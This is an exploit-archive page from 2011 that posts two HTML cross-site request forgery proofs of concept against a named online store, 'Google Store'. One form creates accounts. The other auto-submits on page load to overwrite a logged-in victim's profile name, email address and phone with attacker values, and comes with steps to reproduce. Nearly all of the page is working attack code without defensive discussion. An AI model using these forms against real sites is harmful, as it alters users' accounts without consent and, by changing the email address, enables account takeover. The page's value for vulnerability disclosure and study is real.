Home / exploitsPDF  

Google Store Cross Site Request Forgery

Posted on 27 August 2011

#
#[+]Exploiy Title: Google Store Multiple XSRF Security Vulnerabilities
#[+]Date: 2682011
#[+]Author: C4SS!0 G0M3S
#[+]Vendor Link: https://www.google-store.com
#

#################################### Add User ####################################################
<body style="background-color: black; color: white;">
<form action="https://www.google-store.com/create_account.php" method="POST">
<input type="hidden" name="action" value="process"></input>
<b>First Name:</b><br><input type="text" size="50" name="firstname" value=""></input><br>
<b>Last Name:</b><br><input type="text" size="50" name="lastname" value=""></input><br>
<b>E-mail Address:</b><br><input type="text" size="50" name="email_address" value=""></input><br>
<b>Company:</b><br><input type="text" size="50" name="company" value=""></input><br>
<b>Address:</b><br><input type="text" size="50" name="street_address" value=""></input><br>
<b>Post Code:</b><br><input type="text" size="50" name="postcode" value=""></input><br>
<input type="hidden" name="country" value="30"></input>
<b>City:</b><br><input type="text" size="50" name="city" value=""></input><br>
<b>Telephone:</b><br><input type="text" size="50" name="telephone" value=""></input><br>
<b>Fax:</b><br><input type="text" size="50" name="fax" value=""></input><br>
<input type="hidden" name="newsletter" value="1"></input>
<input type="hidden" name="x" value="47"></input>
<input type="hidden" name="y" value="15"></input>

<input type="submit" value="Send Request"></input>
</form>
#################################################################################################

################################### Profile User Informations Editor ############################
<title>Google Store Profile Informations Editor CSRF Vulnerability.</title>
<body onload="con = confirm('Are You Ready'); if(con){document.send.submit()}" style="background-color:black; color: white;">
<h1>This exploit demonstrates how to exploit a CSRF flaw on the site of the Google Store.<br><br>
Steps to reproduce:<br><br>
1. Log in no <a href="https://www.google-store.com" target="_blank">Google Store</a>.<br>
2. Open this exploit and click in Ok.<br>
3. Check your profile configurations. :)<br><br>
Are You Ready?
</h1>
<form name="send" action="https://www.google-store.com/account_edit.php" method="POST">
<input type="hidden" name="action" value="process"></input>
<input type="hidden" name="firstname" value="Owned"></input>
<input type="hidden" name="lastname" value="Owned"></input>
<input type="hidden" name="email_address" value="Owned@gmail.com"></input>
<input type="hidden" name="telephone" value="123456789"></input>
<input type="hidden" name="fax" value="9876543210"></input>
<input type="hidden" name="x" value="99"></input>
<input type="hidden" name="y" value="99"></input>
</form>
#####################################################################################################

 

TOP

Malware :

Exploits :